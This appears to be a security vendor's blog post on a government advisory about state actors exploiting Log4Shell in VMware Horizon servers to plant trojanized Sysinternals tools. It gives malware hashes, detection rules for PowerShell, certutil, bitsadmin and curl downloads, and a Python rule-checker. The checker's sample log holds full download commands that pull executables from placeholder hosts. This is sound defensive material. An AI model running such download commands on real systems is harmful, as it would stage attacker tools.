Sectors Targeted: Defense Industrial Base, Financial Services, Education, Hospitality
On June 23, 2022, the Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) released a joint Cybersecurity Advisory (CSA) to alert defenders that state-sponsored advanced persistent threat (APT) actors continue to exploit CVE-2021-44228 (Log4Shell) in unpatched VMware Horizon and Unified Access Gateway (UAG) servers to obtain initial access.
Multiple threat actors reportedly began exploiting Log4Shell in December 2021 to deliver trojanized Sysinternals tools that loaded encrypted malware payloads on compromised systems. The report indicates that one of the victims had also been compromised using another VMware vulnerability, CVE-2022-22954, that can result in remote code execution.
Trojanized Sysinternals Tools
To assist customers with protecting their environment from these attacks, AttackIQ has released a new assessment based on the Ingress Tool Transfer (T1105) technique that reproduces the inbound transfer of the actor’s tools and malware to the customer environment. These scenarios test customers’ network and endpoint security controls designed to prevent the introduction of known malicious files to networks and devices.
This assessment covers the following trojanized samples:
| Sample Name | Hash |
| --- | --- |
| Sysinternals Disk Usage Tool | 4a3f79d6821139bc1c3f44fb32e8450ee9705237 |
| Sysinternals PsPing Tool | 33638da3a83c2688e1d20862b1de0b242a22e87c |
| Sysinternals LogonSessions Tool A | 76f2c5f0312346caf82ed42148e78329f8d7b35a |
| Sysinternals LogonSessions Tool B | 6a87d8df99ea58d8612fa58a58b1a3a9512f160e |
Detection Process
It is worth mentioning that, as of the US-CERT alert, it is unclear exactly how the threat actors carried out the ingress tool transfer. The malicious Sysinternals tools could have been uploaded to the victim machine in two different ways: directly via exploitation of Log4Shell, or by accessing the system after exploitation and transferring the tools using living-off-the-land binaries and scripts.
In the event of an ingress tool transfer via exploitation, we recommend leaning on anti-virus products to prevent and alert on these malicious Sysinternals tools by adding these binaries to the global blocklist. Additionally, we encourage placing VMware Horizon systems in a policy that quarantines based on static and dynamic analysis.
In the event of an ingress tool transfer using living off the land binaries and scripts, we have provided some detection details that may be used in EDR/SIEM products to alert and/or prevent on the observations of the below examples:
PowerShell Example:
Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest”) AND “DownloadData” AND “Hidden”)
Certutil Example:
Process Name == Certutil.exe
Command Line CONTAINS (“-urlcache” AND “-f”)
Bitsadmin Example:
Process Name == Bitsadmin.exe
Command Line CONTAINS (“/transfer” AND “http”)
Curl Example:
Process Name == Curl.exe
Command Line CONTAINS (“http” AND “-o”)
Additionally, downloads of file transfer utilities from legitimate sites should be scrutinized to ensure the requests were made by authorized users.
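The four detection examples above are written as vendor-neutral pseudo-queries. As an added illustration (not AttackIQ’s code), the following Python transcribes them into rules and runs them over a handful of constructed process-creation events, including two benign ones that should not fire. The tab-separated log format, the rule names, the example.invalid hostnames, and the choice of case-insensitive substring matching for CONTAINS are all assumptions made here, not details from the advisory.

```python
"""Added example (not AttackIQ's code): the four ingress-tool-transfer
detection rules from the text, applied to constructed process-creation events.
Matching is substring-based and case-insensitive; that is an assumption about
how the rules would be expressed in an EDR/SIEM, not something the text states.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    processes: frozenset   # process image names the rule applies to
    all_of: tuple          # every term must appear in the command line
    any_of: tuple = ()     # at least one of these must appear (empty = no constraint)


# Direct transcription of the page's four examples (rule names are ours).
RULES = (
    Rule("PowerShell download",
         frozenset({"cmd.exe", "powershell.exe"}),
         all_of=("DownloadData", "Hidden"),
         any_of=("IWR", "Invoke-WebRequest")),
    Rule("Certutil urlcache", frozenset({"certutil.exe"}), all_of=("-urlcache", "-f")),
    Rule("Bitsadmin transfer", frozenset({"bitsadmin.exe"}), all_of=("/transfer", "http")),
    Rule("Curl download to file", frozenset({"curl.exe"}), all_of=("http", "-o")),
)


def rule_matches(rule: Rule, process_name: str, command_line: str) -> bool:
    """True when the process name and command line satisfy one rule."""
    if process_name.lower() not in rule.processes:
        return False
    cl = command_line.lower()
    if not all(term.lower() in cl for term in rule.all_of):
        return False
    if rule.any_of and not any(term.lower() in cl for term in rule.any_of):
        return False
    return True


def evaluate(process_name: str, command_line: str) -> list:
    """Names of every rule that fires on a single process-creation event."""
    return [r.name for r in RULES if rule_matches(r, process_name, command_line)]


def parse_line(line: str) -> tuple:
    """Constructed log format: '<timestamp>\\t<process image>\\t<command line>'."""
    timestamp, process, cmdline = line.rstrip("\n").split("\t", 2)
    return timestamp, process, cmdline


def scan_log(lines) -> list:
    """(timestamp, process, rule name) for each rule that fires on each line."""
    hits = []
    for line in lines:
        ts, proc, cl = parse_line(line)
        for name in evaluate(proc, cl):
            hits.append((ts, proc, name))
    return hits


# Constructed sample events; hosts use the reserved .invalid TLD.
SAMPLE_LOG = [
    "2022-06-23T10:00:01Z\tpowershell.exe\tpowershell.exe -WindowStyle Hidden -Command "
    "\"IWR http://example.invalid/du.exe -OutFile du.exe; "
    "(New-Object Net.WebClient).DownloadData('http://example.invalid/k')\"",
    "2022-06-23T10:00:02Z\tCertutil.exe\tcertutil.exe -urlcache -split -f "
    "http://example.invalid/psping.exe C:\\Users\\Public\\psping.exe",
    "2022-06-23T10:00:03Z\tbitsadmin.exe\tbitsadmin.exe /transfer job1 /download "
    "/priority normal http://example.invalid/ls.exe C:\\ProgramData\\ls.exe",
    "2022-06-23T10:00:04Z\tcurl.exe\tcurl.exe http://example.invalid/ls2.exe "
    "-o C:\\ProgramData\\ls2.exe",
    # Benign activity that should not fire: hashing a file, interactive PowerShell.
    "2022-06-23T10:00:05Z\tcertutil.exe\tcertutil.exe -hashfile "
    "C:\\Windows\\System32\\notepad.exe SHA1",
    "2022-06-23T10:00:06Z\tpowershell.exe\tpowershell.exe -Command Get-Process",
]

if __name__ == "__main__":
    for ts, proc, name in scan_log(SAMPLE_LOG):
        print(f"{ts} {proc}: {name}")
```

Because CONTAINS is a plain substring test, short terms such as “-f” or “-o” will also match inside longer switches; tuning those terms to a real product’s tokenised command-line fields is where most of the false-positive reduction happens.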
Mitigation Policies
Ensure that VMware Horizon systems are patched for Log4Shell in accordance with VMware Security Advisories.
Additionally, it is recommended that non-administrators be prevented from using tools such as powershell.exe, cmd.exe, and certutil.exe. This can help prevent malicious usage of these tools on end user accounts.
Network Indicators of Compromise
US-CERT identified multiple IP address indicators of compromise (IOCs) used by the threat actors for their command-and-control infrastructure. A new IOC Replication scenario has been released that will attempt to make web requests directly to the IP addresses identified in both the alert and related malware analysis reports. The infrastructure is no longer actively controlled by the threat actors, so the connections should be rejected; however, this scenario can be used to validate watchlist and blocklist controls in network appliances by looking for attempted access requests to the indicators.
Log4Shell
When Log4Shell was first discovered, AttackIQ quickly released multiple scenarios and an attack graph that emulated common post-compromise activities from threat actors exploiting that vulnerability. Our blog detailing those scenarios along with recommended defensive actions can be found here.
CVE-2022-22954 VMware Remote Code Execution Vulnerability
AttackIQ has also previously released both atomic and network control validation scenarios for customers to test security controls against the VMware vulnerability that allows for remote code execution. Customers can find those scenarios in the AttackIQ platform by searching for:
- CVE-2022-22954 VMware Workspace ONE Access Template Injection
- PCAP Replay – CVE-2022-22954 VMware Workspace ONE Access Template Injection
The Adversary Research Team at AttackIQ is currently reviewing additional details about the malicious activity reported by US-CERT and will release, in the coming days, an advanced attack graph that emulates the actor’s post-compromise behaviors in a broader kill chain.
In summary, AttackIQ’s new assessment will help organizations test their network and endpoint anti-virus controls against known samples used in real attacks. With data generated from continuous testing and use of this assessment, you can focus your teams on achieving key security outcomes, adjusting your security controls, and working to elevate your total security program effectiveness against a known and dangerous threat.
AttackIQ stands at the ready to help security teams implement this assessment and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard.